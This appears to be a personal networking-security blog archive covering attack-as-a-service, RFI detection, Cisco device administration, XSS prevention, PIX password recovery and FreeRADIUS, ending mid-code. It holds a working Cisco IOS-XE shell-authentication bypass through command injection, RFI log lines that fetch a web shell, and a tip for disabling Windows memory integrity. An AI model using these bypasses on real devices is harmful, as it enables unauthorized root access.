CDN and AI in Network Exploitation (Pt.2)

[https://threatpost.com/how-shared-pools-of-cloud-computing-power-are-changing-the-way-attackers-operate/138108/]

In many ways this migration to the cloud mirrors that of legitimate businesses.

It is much less financially advantageous for attackers to maintain large botnets and maintain the knowledge and expertise needed to avoid detection and grow the bot. The fact that it is much easier to pay somebody else to maintain these things and simply rent time should sound very familiar to anybody that uses a cloud service application like Salesforce or Oracle. The advantages for the attackers are very similar to the advantages gained by a legitimate business. Attackers can offer chunks of their botnet or attack infrastructure for sale. They can gain more money, usually bitcoins, by segmenting their entire bot and selling time on it individually.

DDoS-as-a-service has been around for quite some time and was probably the first foray into the attack-as-a-service model. DDoS-as-a-service was very successful because it removes the necessity for maintaining a large botnet from the attackers themselves. Bot herders could focus instead on growing their botnet and modifying the malware that they used in order to exploit new systems rather than worrying about how much an individual attack was going to impact the botnet as a whole.
From there it was a very short jump to segmenting the bot and allowing multiple customers to use chunks of it as they needed, rather than throwing the full weight of the bot at a given target. Many of these services operate under the aegis of a “stresser service” for websites to make sure their sites work under load. However, this was merely a fig leaf for the real purpose, which was allowing anybody with bitcoin or a credit card to purchase time on a bot and direct attack traffic to a website of their choosing.

The success of this model drove other types of attacks to migrate to the service model. Ransomware-as-a-service became a very profitable endeavor. Ransomware authors sell turnkey solutions to anybody that has money and provide secure communications, and in some cases even technical support for the victims.

Today, we see a large number of different types of attacks-as-a-service and this makes it very easy for low sophistication attackers to use very high sophistication tools and techniques. Skilled malware authors can use very advanced techniques that would normally be out of the reach of low sophistication attackers, and rather than worrying about being targeted by law enforcement, can simply sell a subscription or a turnkey solution.
This evolution creates new challenges for defenders.

In the past, it was easy for researchers and security teams with some experience to identify hosting providers that were known to originate attacks and put them into a network blocklist. This was an easy way to blunt a large number of attacks. However, as attackers move to cloud services, the fact that there are so many different tenants on these services makes it difficult or impossible to block their IP ranges, so the chance of an attack getting past a network blocklist increases dramatically.

Additionally, this type of business makes it possible for low sophistication attackers, or attackers without any knowledge at all, to be able to wield very complicated attack tools against targets simply by paying for a license key.

New technologies are constantly reshaping the business landscape, but business leaders also must consider how these can enable new attacks – or make old mitigations obsolete.

CDN and AI use in Network Exploitation (Pt.1)

[https://threatpost.com/the-nature-of-mass-exploitation-campaigns/139428/]

In this article we’ll talk about the tactics and procedures observed by Akamai researchers and security teams as they work through the operational response process of a mass exploitation campaign. Mass exploitation is a term used to convey the process in which attackers launch an attack campaign at large scale using CDN services, or mass mailing services, to reach more victims in less time.
The idea starts with an attacker who has a well-formed payload or exploit, which they need to use at scale in a relatively short period of time.
A common example is a zero-day vulnerability that is posted to an underground forum and purchased by an attacker. As that code starts to get used in the wild, there is a finite amount of time before research teams and incident response teams notice the attack and try to mitigate it. Also, vendor timelines for issuing a patch can vary. This varied timeline of the exploit being “exploitable” is what drives mass exploitation.
There are three main categories of problems in identifying mass exploitation attempts:
Category One (False positives): Identifying mass exploitation among the noise in your environment can be daunting. For instance, if you filter on Remote File Inclusion (RFI) attempts and executed payloads, there is a tremendous amount of noise from security vendors running application scans against your environment looking for risks. The RFI test from WhiteHat Security pictured below is very common: if the scanned system is vulnerable it downloads the script and executes it, and the scanner records the result and adds it to the list of things you need to fix on that system.
Example RFI Exploit Code from WhiteHat Security

Category Two (Obfuscation): Further complicating the identification of attack campaigns is purposeful obfuscation by attackers, who use techniques such as fast-flux domains and host their content on sites like Google or GitHub, which usually doesn't raise attention unless you know what you're looking for.

Example 1: raw.githubusercontent.com
By hosting web shells on GitHub, the attacker doesn't need to manage multiple copies of the files, and there is little chance that site/URL reputation services will blacklist the GitHub domain. Here the attacker is fetching a PHP shell from raw.githubusercontent.com, getting GitHub's CDN caching and acceleration for free when delivering the shell to the target system.
  

Example 2: googleusercontent.com
Attackers have taken advantage of other cloud services to distribute their attack traffic as well, one of them being Google Apps Script. By creating scripts in Google Sheets that issue scripted requests, an attacker can make requests appear to come from a "trusted" location such as Google. Without context this may go unnoticed, or at least makes it harder to separate good requests from bad ones, because of where the requests originate.

An example of a small website hit with a scripted but distributed GitFlood, driving usage costs up over 1,000%

It stays unnoticed until you start to see the volumes of traffic this infrastructure can generate, or until the requests take advantage of an application vulnerability to perform mass exploitation.

Category Three (Visibility): The third category is the challenge of timely threat intelligence and large-scale visibility. If blue teams only see threat information for traffic that reaches their own environment, it is hard to spot larger trends or patterns efficiently.
We frequently see malicious actors upload their malware/exploit code to more than one third-party website or CDN so they can re-use it, usually for redundancy or in case security devices blacklist the URL.
When tracking samples, we identified that they were being fetched from more than one originating IP/ASN, which tells us attackers are proxying through multiple IPs/ASNs when attempting large-scale RFI attacks. This usually indicates the use of fast-flux domains.
Fast flux is a DNS technique used by botnets to hide phishing and malware-delivery sites behind an ever-changing set of compromised hosts acting as proxies. Its use is becoming common for two reasons.

  1. Compromised hosts storing exploit code are discovered quickly and taken offline before the attackers can make use of them.
  2. Because attackers launch exploits at many systems as part of large-scale exploitation attempts, they need their payloads to be highly available. For this reason we see increasing use of low-cost CDNs to host exploit data.
There are other ways attackers win with mass exploitation campaigns, but to raise the success rate of defending against the techniques above, blue teams should focus on three areas:
Interstitial inspection: use reverse proxies or another in-line device/process to inspect and validate requests before they reach back-end application servers.
Large-scale data / threat correlation: the more you know about an inbound request (where it sits in the application workflow) and its source IP (via threat intelligence), the better. Aim for as much context as possible, which usually means a threat feed plus data-sharing relationships with partners.
Layered defenses: keep both perimeter, forward-facing defenses and defenses inside or behind the firewall, to watch for malicious activity inside the corporate network as well as requests going out to the internet.
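As an added example (not from the Threatpost/Akamai article) of the Category One and Category Two points, here is a small Python detector that pulls remote-include URLs out of web-server access-log lines, separates known scanner noise from real attempts, and flags payloads staged on the two domains named above. The log lines, the scanner source address 198.51.100.9 and the hostnames in them are constructed for the example; the function names are mine.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Constructed Apache combined-style access-log lines (not real traffic).
SAMPLE_LOG = """\
203.0.113.7 - - [17/Oct/2018:10:00:01 +0000] "GET /index.php?page=http://raw.githubusercontent.com/example/repo/master/shell.txt HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
198.51.100.9 - - [17/Oct/2018:10:00:05 +0000] "GET /index.php?page=http://scanner.example-vendor.test/rfi-test.txt HTTP/1.1" 200 221 "-" "Vendor-Scanner/1.0"
192.0.2.55 - - [17/Oct/2018:10:00:09 +0000] "GET /view.php?id=42 HTTP/1.1" 200 1200 "-" "Mozilla/5.0"
203.0.113.8 - - [17/Oct/2018:10:00:12 +0000] "GET /include.php?f=http%3A%2F%2Fscript.googleusercontent.com%2Fmacros%2Fecho%3Fx%3D1 HTTP/1.1" 500 0 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<bytes>\d+|-)'
)
URL_RE = re.compile(r"^(?:https?|ftp)://", re.I)

# Scanner source addresses agreed with your vendors (constructed for the example).
KNOWN_SCANNER_IPS = {"198.51.100.9"}
# Code-hosting / cloud domains the post names as payload staging grounds.
STAGING_SUFFIXES = ("raw.githubusercontent.com", "googleusercontent.com")


def remote_includes(target: str):
    """(param, url) pairs for every query parameter whose value is an absolute URL."""
    query = parse_qs(urlsplit(target).query, keep_blank_values=True)
    return [(name, v) for name, values in query.items() for v in values if URL_RE.match(v)]


def host_is_staging(url: str) -> bool:
    host = (urlsplit(url).hostname or "").lower()
    return any(host == s or host.endswith("." + s) for s in STAGING_SUFFIXES)


def classify(src: str, url: str) -> str:
    if src in KNOWN_SCANNER_IPS:
        return "scanner-noise"        # Category One: expected, but still fix what it finds
    if host_is_staging(url):
        return "cdn-staged-payload"   # Category Two: trusted domain, untrusted content
    return "remote-include"


def analyze(log_text: str):
    """One finding per remote-include parameter seen in the log."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        for param, url in remote_includes(m["target"]):
            findings.append({
                "src": m["src"], "param": param, "url": url,
                "status": int(m["status"]), "verdict": classify(m["src"], url),
            })
    return findings


def suspicious_sources(findings):
    """Source addresses with at least one non-scanner RFI attempt, with counts."""
    counts = {}
    for f in findings:
        if f["verdict"] != "scanner-noise":
            counts[f["src"]] = counts.get(f["src"], 0) + 1
    return counts
```

The scanner is recognised by its agreed source address rather than by hostname or User-Agent, because both of those are trivial for an attacker to copy; the staging-domain check is a suffix match so that per-account subdomains such as script.googleusercontent.com are caught too. A 200 on an RFI request from a non-scanner source is the line to investigate first, since it means the include may have been fetched.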






IOS image verification - running image + saved file

Verify the authenticity and integrity of the binary file by using the show software authenticity file command. In the following example, taken from a Cisco 1900 Series Router, the command is used to verify the authenticity of c1900-universalk9-mz.SPA.152-4.M2.bin on the system:
Router# show software authenticity file c1900-universalk9-mz.SPA.152-4.M2

File Name                     : c1900-universalk9-mz.SPA.152-4.M2
Image type                    : Production
    Signer Information
        Common Name           : CiscoSystems
        Organization Unit     : C1900
        Organization Name     : CiscoSystems
    Certificate Serial Number : 509AC949
    Hash Algorithm            : SHA512
    Signature Algorithm       : 2048-bit RSA
    Key Version               : A
In addition, administrators can use the show software authenticity running command to verify the authenticity of the image that is currently booted and in use on the device. Administrators should verify that the Certificate Serial Number value matches the value obtained by using the show software authenticity file on the binary file. The following example shows the output of show software authenticity running on a Cisco 1900 Series Router running the c1900-universalk9-mz.SPA.152-4.M2 image.
Router# show software authenticity running
 
SYSTEM IMAGE
------------
Image type                    : Production
    Signer Information
        Common Name           : CiscoSystems
        Organization Unit     : C1900
        Organization Name     : CiscoSystems
    Certificate Serial Number : 509AC949
    Hash Algorithm            : SHA512
    Signature Algorithm       : 2048-bit RSA
    Key Version               : A
    Verifier Information
        Verifier Name         : ROMMON 1
        Verifier Version      : System Bootstrap, Version 15.0(1r)M9, RELEASE SOFTWARE (fc1)
Technical Support: http://www.cisco.com/techsupport
This example also shows that the Certificate Serial Number value, 509AC949, matches the one obtained with the previous example.
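The comparison the text describes, file output against running output, is easy to automate across a fleet. The following Python is an added example (not a Cisco tool): it parses the two outputs shown above, which are embedded verbatim as sample input, and reports any field that differs; the function names are mine.

```python
import re

# Outputs of the two show commands above, embedded as sample input.
FILE_OUTPUT = """\
File Name                     : c1900-universalk9-mz.SPA.152-4.M2
Image type                    : Production
    Signer Information
        Common Name           : CiscoSystems
        Organization Unit     : C1900
        Organization Name     : CiscoSystems
    Certificate Serial Number : 509AC949
    Hash Algorithm            : SHA512
    Signature Algorithm       : 2048-bit RSA
    Key Version               : A
"""

RUNNING_OUTPUT = """\
SYSTEM IMAGE
------------
Image type                    : Production
    Signer Information
        Common Name           : CiscoSystems
        Organization Unit     : C1900
        Organization Name     : CiscoSystems
    Certificate Serial Number : 509AC949
    Hash Algorithm            : SHA512
    Signature Algorithm       : 2048-bit RSA
    Key Version               : A
    Verifier Information
        Verifier Name         : ROMMON 1
        Verifier Version      : System Bootstrap, Version 15.0(1r)M9, RELEASE SOFTWARE (fc1)
"""

# "Key : value" lines; section headers without a colon are skipped.
FIELD_RE = re.compile(r"^\s*(?P<key>[A-Za-z][A-Za-z ]*?)\s*:\s*(?P<val>.*\S)\s*$")

# Fields that must agree between the file on flash and the running image.
COMPARE = (
    "Image type", "Common Name", "Organization Unit", "Organization Name",
    "Certificate Serial Number", "Hash Algorithm", "Signature Algorithm", "Key Version",
)


def parse_authenticity(text: str) -> dict:
    """Flatten 'show software authenticity ...' output into a key/value dict."""
    fields = {}
    for line in text.splitlines():
        m = FIELD_RE.match(line)
        if m:
            fields[m["key"]] = m["val"]
    return fields


def check_image(file_text: str, running_text: str) -> list:
    """Return a list of problems; an empty list means the running image is the signed file."""
    f, r = parse_authenticity(file_text), parse_authenticity(running_text)
    problems = []
    for key in COMPARE:
        if f.get(key) != r.get(key):
            problems.append(f"{key}: file={f.get(key)!r} running={r.get(key)!r}")
    if f.get("Image type") != "Production":
        problems.append("file is not a Production-signed image")
    if "Verifier Name" not in r:
        problems.append("running image reports no verifier; signature was not checked at boot")
    return problems
```

show software authenticity proves the image carries a valid Cisco signature; it does not prove it is the release you meant to install. Pair it with verify /md5 flash:<image> <hash> against the hash published on cisco.com, and treat a missing Verifier Information section or any mismatch as a reason not to trust the box until it has been re-imaged from a known-good source.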

Cisco IOS-XE - Request Platform System Shell

Verifying Authenticity for Digitally Signed Images


Older Catalyst 3K-series (cat3k) IOS-XE switches, shell access via request system shell:
[code]
Catalyst-3650#request system shell
Activity within this shell can jeopardize the functioning of the system.
Are you sure you want to continue? [y/n] y
Challenge: 94d5c01766c7a0a29c8c59fec3ab992[..]
Please enter the shell access response based on the
above challenge (Press "Enter" when done or to quit.):
/bin/sh
Key verification failed
[/code]

Workaround:
[code]
Please enter the shell access response based on the above challenge
(Press "Enter" when done or to quit.):
`bash 1>&2`
[/code]

No input validation: the response string is handed to a shell, so anything inside backticks (`...`) runs as a command
[code]
Please enter the shell access response based on the above challenge
(Press "Enter" when done or to quit.):
`reboot`
SecureShell: SecureShell [debug]Key verification failed
Switch#
  
Unmounting ng3k filesystems...
Unmounted /dev/sda3...
Warning! - some ng3k filesystems may not have unmounted cleanly...
Please stand by while rebooting the system...
Restarting system.
  
Booting...Initializing RAM +++++++@@@@@@@@...++++++++
[/code]

Netcat found ...
[code]
bash-3.2# find / -name nc
/tmp/sw/mount/cat3k_caa-infra.SPA.03.03.03SE.pkg/usr/binos/bin/nc
/usr/binos/bin/nc
[/code]

What can be done with it? Anything you can cross-compile: the box is big-endian MIPS, so a mips toolchain lets you bring your own binaries in over USB (here the ninvaders game, as a proof of concept)...
[code]

[EXTRA]    Building a toolchain for:                 
[EXTRA]      build  = x86_64-unknown-linux-gnu
[EXTRA]      host   = x86_64-unknown-linux-gnu
[EXTRA]      target = mips-unknown-elf           

bash-3.2# file /mnt/usb0/ninvaders
/mnt/usb0/ninvaders: ELF 32-bit MSB executable, MIPS, MIPS-I version 1 (SYSV),
dynamically linked (uses shared libs), for GNU/Linux 2.6.18, with unknown capability
0x41000000 = 0xf676e75, stripped

[/code]

When you request a shell the following happens:

a) shell_wrapper calls system('code_sign_verify_nova_pkg SecureShell challenge response') (the same binary is used to verify the images)
b) code_sign_verify_nova_pkg reads 2k from /dev/mtdblock6 via libcodesign_pd.so and libflash.so, signs the challenge, compares the result with the response and returns 0 if it is valid, non-zero otherwise
c) because the response is pasted unescaped into that shell command line, anything like x || /bin/true forces a zero exit status and the check passes, and backticks run arbitrary commands (as the bash and reboot examples above show)

shell_wrapper skips the verification entirely if DISABLE_SHELL_AUTHENTICATION=1 is set in its environment

The RSA public key on mtdblock6 can be replaced, so if you hold the matching private key you can generate valid responses yourself.

You can also escape the IOS filesystem jail (/mnt/sd3/user) with ../../ : copy foo ../../etc would copy foo to /etc.
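To make steps a) to c) concrete, here is an added Python model of the two call styles (example code of mine, not Cisco's shell_wrapper). The real verifier binary is stood in for by false, which ignores its arguments and always exits 1, the way a failed key check does; the challenge value deadbeef and the function names are assumptions for the example.

```python
import shlex
import subprocess

# Stand-in for code_sign_verify_nova_pkg (assumption for this example): `false`
# accepts any arguments and always exits 1, i.e. "Key verification failed".
VERIFIER = "false"
SERVICE = "SecureShell"


def verify_unsafe(challenge: str, response: str, env=None):
    """The pattern described in a)-c): one string handed to system(), i.e. /bin/sh -c.

    Returns (accepted, stdout) so that an injected command is observable.
    """
    env = {} if env is None else env
    # Back door noted on the page: the check is skipped when this variable is set.
    if env.get("DISABLE_SHELL_AUTHENTICATION") == "1":
        return True, ""
    cmd = f"{VERIFIER} {SERVICE} {challenge} {response}"
    proc = subprocess.run(cmd, shell=True, capture_output=True, text=True)
    return proc.returncode == 0, proc.stdout


def verify_quoted(challenge: str, response: str) -> bool:
    """Minimal fix if a shell really is unavoidable: quote every untrusted argument."""
    cmd = f"{VERIFIER} {SERVICE} {shlex.quote(challenge)} {shlex.quote(response)}"
    return subprocess.run(cmd, shell=True).returncode == 0


def verify_safe(challenge: str, response: str) -> bool:
    """Proper fix: execve-style argv, so no shell ever parses the response."""
    proc = subprocess.run([VERIFIER, SERVICE, challenge, response])
    return proc.returncode == 0
```

The || /bin/true bypass works only because the verifier's exit status, not a value it computes, is the whole decision and a shell gets to rewrite that command line; with argv the response is a single opaque argument and the same strings fail as they should. The environment-variable bypass is the third weakness and no quoting fixes it: a wrapper that can be told to skip authentication must not trust its environment.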

Wednesday, October 17, 2018

Cisco OUIs (MAC address prefixes)

00:00:0C        Cisco                  # CISCO SYSTEMS, INC.
00:01:42        Cisco                  # CISCO SYSTEMS, INC.
00:01:43        Cisco                  # CISCO SYSTEMS, INC.
00:01:63        Cisco                  # CISCO SYSTEMS, INC.
00:01:64        Cisco                  # CISCO SYSTEMS, INC.
00:01:96        Cisco                  # CISCO SYSTEMS, INC.
00:01:97        Cisco                  # CISCO SYSTEMS, INC.
00:01:C7        Cisco                  # CISCO SYSTEMS, INC.
00:01:C9        Cisco                  # CISCO SYSTEMS, INC.
00:02:16        Cisco                  # CISCO SYSTEMS, INC.
00:02:17        Cisco                  # CISCO SYSTEMS, INC.
00:02:3D        Cisco                  # Cisco Systems, Inc.
00:02:4A        Cisco                  # CISCO SYSTEMS, INC.

Sunday, September 30, 2018

Steps to prevent leverage of cross-site scripting attacks

How-To: preventing cross-site scripting (XSS) attacks, from development to deployment

 **Developers** 

    - should decide what safe input looks like for each field and reject everything else, whether it is text, JavaScript or any other unexpected piece of code
    - depending on the input field, should restrict it to the characters that make sense there (excluding the ones that cause trouble) and cap its maximum length
    - should make sure improperly formatted data is never inserted directly into HTML content, and encode output for the context it lands in; one unescaped field can compromise the whole web application
    - should use prepared statements (parameterised queries) for every database query, in addition to the input validation described above

**Website operators**

    - should choose third-party web application providers carefully, to ensure their products have the right security measures in place
    - should test the web apps to ensure they are not vulnerable to cross-site scripting or SQL injection
    - should continuously scan their sites to detect unauthorised code, using not only automated vulnerability scanners (e.g. Nikto, OWASP ZAP) but also manual testing
    - have to be proactive: hire experienced professionals (white or grey hat) who can assess the web app's resistance to these attacks with a custom approach
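The developer items above, as an added Python example (not from the TechRepublic article): each weak construct next to its fix, using only the standard library. The comment data and the in-memory users table are constructed for the example; the function names are mine.

```python
import html
import sqlite3


def render_comment_unsafe(username: str, comment: str) -> str:
    """XSS: untrusted text concatenated straight into HTML."""
    return f"<p><b>{username}</b>: {comment}</p>"


def render_comment_safe(username: str, comment: str) -> str:
    """Output encoding: every untrusted value is escaped for the HTML context it lands in."""
    return f"<p><b>{html.escape(username)}</b>: {html.escape(comment)}</p>"


def is_valid_username(value: str) -> bool:
    """Allowlist validation for a field with a known shape: ASCII letters, digits, '_', 3-32 chars."""
    return (3 <= len(value) <= 32 and value.isascii()
            and all(c.isalnum() or c == "_" for c in value))


def make_db() -> sqlite3.Connection:
    """Constructed in-memory table for the example."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT NOT NULL)")
    conn.executemany("INSERT INTO users (name) VALUES (?)", [("alice",), ("bob",)])
    return conn


def find_user_unsafe(conn: sqlite3.Connection, name: str):
    """SQL injection: string formatting builds the query text."""
    return conn.execute(f"SELECT id, name FROM users WHERE name = '{name}'").fetchall()


def find_user_safe(conn: sqlite3.Connection, name: str):
    """Prepared statement: the value travels as a bound parameter, never as SQL text."""
    return conn.execute("SELECT id, name FROM users WHERE name = ?", (name,)).fetchall()
```

Validation and encoding are not interchangeable: the username check rejects markup up front because the field has a known shape, while free text such as a comment cannot be "validated" into safety and must be escaped at output time. The parameterised query is what makes the injection string return nothing instead of every row.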
 ========================================================================
     The last step is important!
Anything less than a proactive, comprehensive approach to securing the sites risks exposing a great number of consumers' personal data, and, under regulations like GDPR, the penalties that follow.
     As a good example of the DOs and DON'Ts we might mention the British Airways breach reported in September 2018, but you can pick practically any of the large attacks of the past 5 years.
 ========================================================================
         
                   ::Remember::

 A hardened web server (patched host, TLS) does not by itself make the web application running on it secure.
     
 source: TechRepublic 
( https://www.techrepublic.com/article/british-airways-data-theft-demonstrates-need-for-cross-site-scripting-restrictions )

Saturday, July 21, 2018

HowTo - Intel HD 3000 driver issues in Windows 10 (1803)

If you've updated to the latest version of Windows 10 (1803) and the Intel HD 3000 graphics driver now fails with an error like the following:

Windows cannot load the device driver for this hardware.
The driver may be corrupted or missing. (Code 39)

{Bad Image}
%hs is either not designed to run on Windows or it contains an error.
Try installing the program again using the original installation media
or contact your system administrator or the software vendor for support.
Error status 0x


To quickly resolve this issue

1. Open the Registry Editor
(Win+R to open Run, type regedit, Enter)

2. Then go to
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\DeviceGuard\Scenarios\HypervisorEnforcedCodeIntegrity

3. Change the Enabled DWORD value from 1 to 0 (0 = off)

4. Restart and enjoy: your graphics work like a charm again!

What this actually does: the value turns off Memory Integrity (Hypervisor-Enforced Code Integrity, HVCI), the protection that stops incompatible or unsigned driver code from being loaded into the kernel; the same switch is exposed under Windows Security > Device security > Core isolation. The old Intel driver loads again only because that check is gone, so prefer an HVCI-compatible driver if one exists, and if you must leave the switch off, be aware that the machine has less kernel protection than a default 1803 install.

Friday, July 15, 2016

PIX 525 - Part I.

PIX 525 Security Appliance

Password recovery how-to, step by step


This platform has an Unrestricted (UR) license.
  --------------------------------------------------------------------------
                                 .            .                            
                                 |            |                            
                                |||          |||                           
                              .|| ||.      .|| ||.                         
                           .:||| | |||:..:||| | |||:.                      
                            C i s c o  S y s t e m s                       
  --------------------------------------------------------------------------

Power on just ONE of the devices, the one that is going to be primary.
When logged in, issue:

write erase
reload
 
When it boots up again, let's configure it!

One of the devices still had a configuration, so I had to perform a password recovery. If you are used to Cisco switches and routers, be warned: on the PIX this is not a config-register trick. A special password-recovery image (here 8529-np70.bin, the np70 tool for PIX 7.0 software) has to be loaded from a TFTP server while the box sits in monitor mode.

So first, let's serve the file from the TFTP server on a C2811 router:

tftp-server file usbflash0:8529-np70.bin
 
When you have TFTP ready, prepare an interface for the connection to the PIX. I set 172.17.17.17 as the IP address and connected Fa0/1 to Ethernet 0 on the PIX.

Use BREAK or ESC to interrupt flash boot.
Use SPACE to begin flash boot immediately.
Flash boot interrupted.                        
0: i8255X @ PCI(bus:0 dev:14 irq:10)
1: i8255X @ PCI(bus:0 dev:13 irq:11)

Ethernet auto negotiation timed out.
Ethernet port 1 could not be initialized.
Use ? for help.
monitor>
monitor>
monitor> ?
?                 this help message
address   [addr]  set IP address of the PIX interface on which
                  the TFTP server resides
file      [name]  set boot file name
gateway   [addr]  set IP gateway
help              this help message
interface [num]   select TFTP interface
ping      <addr>  send ICMP echo
reload            halt and reload system
server    [addr]  set server IP address
tftp              TFTP download
timeout           TFTP timeout
trace             toggle packet tracing
monitor>
monitor> address ?
address 0.0.0.0
monitor>
monitor> interface 0
0: i8255X @ PCI(bus:0 dev:14 irq:10)
1: i8255X @ PCI(bus:0 dev:13 irq:11)

Using 0: i82557 @ PCI(bus:0 dev:14 irq:10), MAC: 0013.60e2.bbb6
monitor>
monitor> address 172.17.17.18 255.255.0.0
address 0.0.0.0

monitor> address 172.17.17.18
address 172.17.17.18
monitor>
monitor> gateway 172.17.17.17
gateway 172.17.17.17
monitor>
monitor>
monitor> ping 172.17.17.17   (test this first: no ping, no tftp ;)
Sending 5, 100-byte 0xe1ab ICMP Echoes to 172.17.17.17, timeout is 4 seconds:
!!!!!
Success rate is 100 percent (5/5)
monitor>
monitor>
monitor> server 172.17.17.17
server 172.17.17.17
monitor>
monitor> file 8529-np70.bin
file 8529-np70.bin
monitor>
monitor>
monitor> tftp
tftp 8529-np70.bin@172.17.17.17 via 172.17.17.17.............................................................................................................................................................................................................................................................
Received 129024 bytes

Cisco PIX Security Appliance password tool (3.0) #0: Thu Jun  9 21:45:44 PDT 2005

Initializing flashfs...
flashfs[0]: 7 files, 3 directories
flashfs[0]: 0 orphaned files, 0 orphaned directories
flashfs[0]: Total bytes: 16128000
flashfs[0]: Bytes used: 14300160
flashfs[0]: Bytes available: 1827840
flashfs[0]: Initialization complete.
Using the default startup configuration

Do you wish to erase the passwords? y/n [n]: y
The following lines will be removed from the configuration:
        enable password H75KO93BH/Ur8Ksg encrypted
        passwd H75KO93BH/Ur8Ksg encrypted
        aaa authentication enable console LOCAL
        aaa authentication ssh console LOCAL
        aaa authorization command LOCAL

Do you want to remove the commands listed above from the configuration? y/n [n] y
Passwords and aaa commands have been erased.


And that's it: we have access to enable mode and configure terminal on the PIX 525. Note what this implies: anyone with console access and a TFTP server on the wire can do the same, so physical and console security is part of the firewall's security, and after a recovery the erased passwords and aaa lines must be set again before the box goes back into service.

New issue: 
- one device has an Active/Active license and the other Active/Standby

   

Thursday, July 7, 2016

IPv6 tunnelling


IPv6 Tunnelling
w/Cisco Router 2811


telnet 64.62.142.154

*************************************************************************
*****                      route-server.he.net                      *****
*****              Hurricane Electric IP Route Monitor              *****
*****                           AS 6939                             *****
*************************************************************************

This router maintains peering sessions with some of the core routers in
Hurricane Electric's network. Hurricane Electric operates an international
Internet Backbone and offers transit, colocation, and dedicated servers.

Location                  IPv4                  IPv6
---------------------     ----------------      ------------------------
North America
 Equinix Seattle          216.218.252.176       2001:470:0:3d::1
 Equinix Palo Alto        216.218.252.165       2001:470:0:1b::1
 Equinix San Jose         216.218.252.164       2001:470:0:1a::1
 Hurricane Fremont 1      216.218.252.161       2001:470:0:23::1
 One Wilshire Los Angeles 216.218.252.178       2001:470:0:6c::1
 Equinix Chicago          216.218.252.168       2001:470:0:16::1
 Equinix Dallas           216.218.252.167       2001:470:0:1d::1
 Equinix Toronto          216.218.252.147       2001:470:0:99::1
 Equinix New York         216.218.252.171       2001:470:0:13::1
 Equinix Ashburn          216.218.252.169       2001:470:0:17::1
 NOTA Miami               216.218.252.177       2001:470:0:4a::1
 CoreSite Denver          216.218.252.157       2001:470:0:155::1
 1102 Grand Kansas City   216.218.252.190       2001:470:0:22b::1
 Cologix Montreal         216.218.252.193       2001:470:0:224::1
Europe
 Telecity London          216.218.252.211       2001:470:0:2cc::1
 NIKHEF Amsterdam         216.218.252.173       2001:470:0:e::1
 Interxion Frankfurt      216.218.252.174       2001:470:0:2a::1
 Telehouse Paris          216.218.252.184       2001:470:0:1ae::1
 Equinix Zurich           216.218.252.153       2001:470:0:10c::1
 TeleCity Stockholm       216.218.252.154       2001:470:0:10f::1
 PLIX/LIM Warsaw          216.218.252.189       2001:470:0:215::1
Asia
 Mega-I Hong Kong         216.218.252.180       2001:470:0:c2::1
 Equinix Tokyo            216.218.252.151       2001:470:0:10a::1
 Equinix Singapore        216.218.252.179       2001:470:0:169::1

Configuration of IPv6 tunnelling

(The IP addresses have been changed for security reasons)
conf t
ipv6 unicast-routing
!        
interface Tunnel0
 description Hurricane Electric IPv6 Tunnel Broker
 no ip address
 ipv6 address 2001:220:6E:218::2/64
 ipv6 enable
 tunnel source 28.10.16.15
 tunnel mode ipv6ip
 tunnel destination 216.66.86.12

!
The tunnel source must be the public IPv4 address registered with the tunnel broker (the broker only accepts protocol 41 from that endpoint), and traffic will only use the tunnel once an IPv6 default route points at it (ipv6 route ::/0 Tunnel0).


FreeRadius with Raspberry Pi


RADIUS Authentication Server on RaspberryPi

Before the configuration changes (Access-Reject):
test@raspberryPi:~ $ radtest kralvesmiru test123 127.0.0.1 0 testing123
Sending Access-Request of id 114 to 127.0.0.1 port 1812
    User-Name = "kralvesmiru"
    User-Password = "test123"
    NAS-IP-Address = 127.0.1.1
    NAS-Port = 0
    Message-Authenticator = 0x00000000000000000000000000000000
rad_recv: Access-Reject packet from host 127.0.0.1 port 1812, id=114, length=20
test@raspberryPi:~ $

Files changed (local users, client definitions with their shared secrets, and the server configuration):


sudo nano /etc/freeradius/users
sudo nano /etc/freeradius/clients.conf
sudo nano /etc/freeradius/radiusd.conf

FreeRadius restarted:


 sudo service freeradius stop
sudo service freeradius start


Log file followed live (for a real debug trace, stop the service and run the daemon in the foreground with freeradius -X):

sudo tail -f /var/log/freeradius/radius.log

And voilà! RADIUS is working now with a basic configuration.

test@raspberryPi:~ $ radtest kralvesmiru test123 127.0.0.1 0 testing123
Sending Access-Request of id 36 to 127.0.0.1 port 1812
    User-Name = "kralvesmiru"
    User-Password = "test123"
    NAS-IP-Address = 127.0.1.1
    NAS-Port = 0
    Message-Authenticator = 0x00000000000000000000000000000000
rad_recv: Access-Accept packet from host 127.0.0.1 port 1812, id=36, length=20
test@raspberryPi:~ $
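To show what radtest actually put on the wire, and why the shared secret is the whole game, here is an added Python example (mine, not FreeRADIUS code) that builds the same Access-Request the output above shows, hides the User-Password the way RFC 2865 does, signs the packet with a Message-Authenticator (RFC 2869), and makes the accept/reject decision a server would. The user, password, NAS-IP-Address and the secret testing123 are the ones from the radtest session; the function names are mine.

```python
import hashlib
import hmac
import os
import socket
import struct

ACCESS_REQUEST, ACCESS_ACCEPT, ACCESS_REJECT = 1, 2, 3
USER_NAME, USER_PASSWORD, NAS_IP_ADDRESS, NAS_PORT, MESSAGE_AUTHENTICATOR = 1, 2, 4, 5, 80


def hide_password(password: bytes, secret: bytes, authenticator: bytes) -> bytes:
    """RFC 2865 5.2: pad to 16-byte blocks, XOR each with MD5(secret + previous block)."""
    padded = password + b"\x00" * (-len(password) % 16)
    out, prev = b"", authenticator
    for i in range(0, len(padded), 16):
        key = hashlib.md5(secret + prev).digest()
        block = bytes(p ^ k for p, k in zip(padded[i:i + 16], key))
        out, prev = out + block, block
    return out


def reveal_password(hidden: bytes, secret: bytes, authenticator: bytes) -> bytes:
    """Inverse of hide_password, as the server does it."""
    out, prev = b"", authenticator
    for i in range(0, len(hidden), 16):
        chunk = hidden[i:i + 16]
        key = hashlib.md5(secret + prev).digest()
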